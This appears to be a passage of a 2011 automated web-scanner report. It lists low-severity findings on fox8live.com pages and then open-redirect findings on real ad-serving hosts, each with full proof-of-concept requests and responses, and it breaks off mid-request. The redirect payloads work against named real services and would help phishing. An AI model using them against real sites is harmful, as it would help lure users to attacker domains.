User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:33 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 22933
Connection: keep-alive
Content-Length: 22933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2Ng9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYCAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFgAFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBWByZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZBgBBWFjdGwwMCRjdGwwMCRjdGwwMCRjdGwwMCRjdGwwMCRDb21tb25QYWdlJENvbW1vbkJvZHkkQ29tbW9uQ29udGVudCRDb21tb25SaWdodENvbHVtbiRjdGwwMCRfJGN0bDAwDxQrAAJkZmQ=" />
...[SNIP]...

8.18. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh4Kb25rZXlwcmVzcwVacmV0dXJuIElETVRleHRCb3hLZXlQcmVzcyhldmVudCwgJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fU2VhcmNoJyk7ZAIHDw8WAh4ISW1hZ2VVcmwFFy9pbWFnZXMvdHJhbnNwYXJlbnQuZ2lmZGQCJw9kFgICCQ9kFgICBQ9kFgICAQ9kFgICAQ9kFgRmD2QWAmYPZBYEAgoPDxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50AgFkZAIRD2QWAgICDxYCHgpCZWhhdmlvcklEBRZNb2RhbFdpbmRvd18yMDk1NTMzMDE5ZAICD2QWBGYPZBYCZg9kFgICAQ8PFgQfA2cfBGZkZAIBD2QWAmYPZBYCZg9kFgRmD2QWAgIBD2QWAmYPZBYCAgEPZBYCZg9kFgJmDxBkZBYBZmQCAg8WAh8FBRFfUmVwb3J0Q29udGVudF9NV2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFbGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRDbG9zZQWFAWN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRFbWFpbFN0b3J5Q29udHJvbCRfJENvcHlUb1NlbGYFY2N0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRST0MkUkMkXyRNVyRDbG9zZQ==" />
...[SNIP]...

8.19. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh4Kb25rZXlwcmVzcwVacmV0dXJuIElETVRleHRCb3hLZXlQcmVzcyhldmVudCwgJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fU2VhcmNoJyk7ZAIHDw8WAh4ISW1hZ2VVcmwFFy9pbWFnZXMvdHJhbnNwYXJlbnQuZ2lmZGQCJw9kFgICCQ9kFgICBQ9kFgICAQ9kFgICAQ9kFgRmD2QWAmYPZBYEAgoPDxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50AgFkZAIRD2QWAgICDxYCHgpCZWhhdmlvcklEBRZNb2RhbFdpbmRvd18yMDk1NTMzMDE5ZAICD2QWBGYPZBYCZg9kFgICAQ8PFgQfA2cfBGZkZAIBD2QWAmYPZBYCZg9kFgRmD2QWAgIBD2QWAmYPZBYCAgEPZBYCZg9kFgJmDxBkZBYBZmQCAg8WAh8FBRFfUmVwb3J0Q29udGVudF9NV2QYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFbGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRDbG9zZQWFAWN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRFbWFpbFN0b3J5Q29udHJvbCRfJENvcHlUb1NlbGYFY2N0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRST0MkUkMkXyRNVyRDbG9zZQVbY3RsMDAkY3RsMDAkY3RsMDAkY3RsMDAkQ29tbW9uUGFnZSRDb21tb25Cb2R5JENvbW1vbkNvbnRlbnQkQ29tbW9uUmlnaHRDb2x1bW4kY3RsMDAkXyRjdGwwMA8UKwACZGZk" />
...[SNIP]...

8.20. http://www.fox8live.com/rss/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /rss/default.aspx

Request

GET /rss/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:02 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27462
Connection: keep-alive
Content-Length: 27462


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTUyOTMwNjQxMQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIbD2QWAmYPZBYGAgEPEA9kFgIeCG9uQ2hhbmdlBXpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBVpyZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZGQ=" />
...[SNIP]...

8.21. http://www.fox8live.com/widgets/serve.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /widgets/serve.aspx

Request

GET /widgets/serve.aspx?wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1 HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 9152
Connection: keep-alive
Content-Length: 9152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTExODg5NDk1OA9kFgJmD2QWAmYPZBYCAgMPZBYCAgMPZBYCAgEPZBYCAgMPZBYCZg9kFgJmD2QWAgIBD2QWBGYPZBYCZg9kFgRmDw9kFgQeCW9ua2V5ZG93bgVBaWYoZXZlbnQua2V5Q29kZT09MTMpe2V2ZW50LmNhbmNlbD10cnVlO2V2ZW50LnJldHVyblZhbHVlPWZhbHNlO30eB29ua2V5dXAFKFNlYXJjaEl0KGV2ZW50LHRoaXMudmFsdWUpO3JldHVybiBmYWxzZTtkAgEPDxYCHg1PbkNsaWVudENsaWNrBWNHb0J1dHRvbihldmVudCxldmFsKCdjdGwwMF9jdGwwMF9UeXBlQm9keV9Cb2R5X2N0bDAwX19fY3RsMDBfX190eHRfc2lsU2VhcmNoJykudmFsdWUpO3JldHVybiBmYWxzZTtkZAICD2QWAmYPZBYCAgEPZBYGAgEPZBYCAgEPZBYCZg9kFgJmDw8WBB4ISW1hZ2VVcmwFTi9tZWRpYS9zaWwvNjIyLzAvMS9jLzAxY2ExYmE1LWQ1MzUtNGQ4OS05MGI2LTY5NTdlOTA3MzUyOC9yb3lhbC1wYWxtLTUwLTUwLmpwZx4HVmlzaWJsZWdkZAICD2QWAgIBD2QWAmYPZBYCZg8PFgQfAwVHL21lZGlhL3NpbC82MjIvZi83LzQvZjc0NjEzOTEtMjk5My00MmM0LWIyNDAtYzZlNDYxY2EzZDBjL3BhdV81MHg1MC5qcGcfBGdkZAIDD2QWAgIBD2QWAmYPZBYCZg8PFgQfAwVIL21lZGlhL3NpbC82MjIvZi9jLzQvZmM0YmNlMDYtZmEwNi00MDY4LTliMzEtZTZmNmI4ODU5MTk4L3d2dWVfNTB4NTAuanBnHwRnZGQYBAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFN2N0bDAwJGN0bDAwJFR5cGVCb2R5JEJvZHkkY3RsMDAkXyRjdGwwMCRfJGJ1dF9zaWxTZWFyY2gFO2N0bDAwJGN0bDAwJFR5cGVCb2R5JEJvZHkkY3RsMDAkXyRjdGwwMiRfJGN0bDA3JF8kVHJhY2tWaWV3Dw9kZmQFO2N0bDAwJGN0bDAwJFR5cGVCb2R5JEJvZHkkY3RsMDAkXyRjdGwwMiRfJGN0bDA0JF8kVHJhY2tWaWV3Dw9kZmQFO2N0bDAwJGN0bDAwJFR5cGVCb2R5JEJvZHkkY3RsMDAkXyRjdGwwMiRfJGN0bDAxJF8kVHJhY2tWaWV3Dw9kZmQ=" />
...[SNIP]...

8.22. http://www.fox8live.com/wireless/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU0OTkwNzIzNg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYCAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFgAFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBWByZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZGQ=" />
...[SNIP]...

9. Open redirection  previous  next
There are 7 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a8485bbedc1e828b9/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http%3a//a8485bbedc1e828b9/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:40:05 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:40:05 GMT; Path=/
Location: http://a8485bbedc1e828b9/a?http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:40:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


9.2. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is used to perform an HTTP redirect. The payload .a6edacbe47e169caa/ was submitted in the REST URL parameter 2. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /rfw/.a6edacbe47e169caa//9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&adsafe_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2F&adsafe_type=abdfq&adsafe_jsinfo=sl:na,em:false,v:3.6 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F435B78AAE54D6DB5E0805BB37A43C93

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://.a6edacbe47e169caa/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$
Content-Length: 0
Date: Mon, 09 May 2011 15:39:54 GMT
Connection: close


9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /log/usatoday/debug

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a2c78ad8ffbc313cb/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /log/usatoday/debug?type=warn&msg=rbox.css%20not%20loaded%201%20time%28s%29&id=2836&url=http%3a//a2c78ad8ffbc313cb/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a2c78ad8ffbc313cb/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/available

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a905ae88c4b0a573a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/available?pi=46732364&pt=text&li=rbox-t2v&id=4827&url=http%3a//a905ae88c4b0a573a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
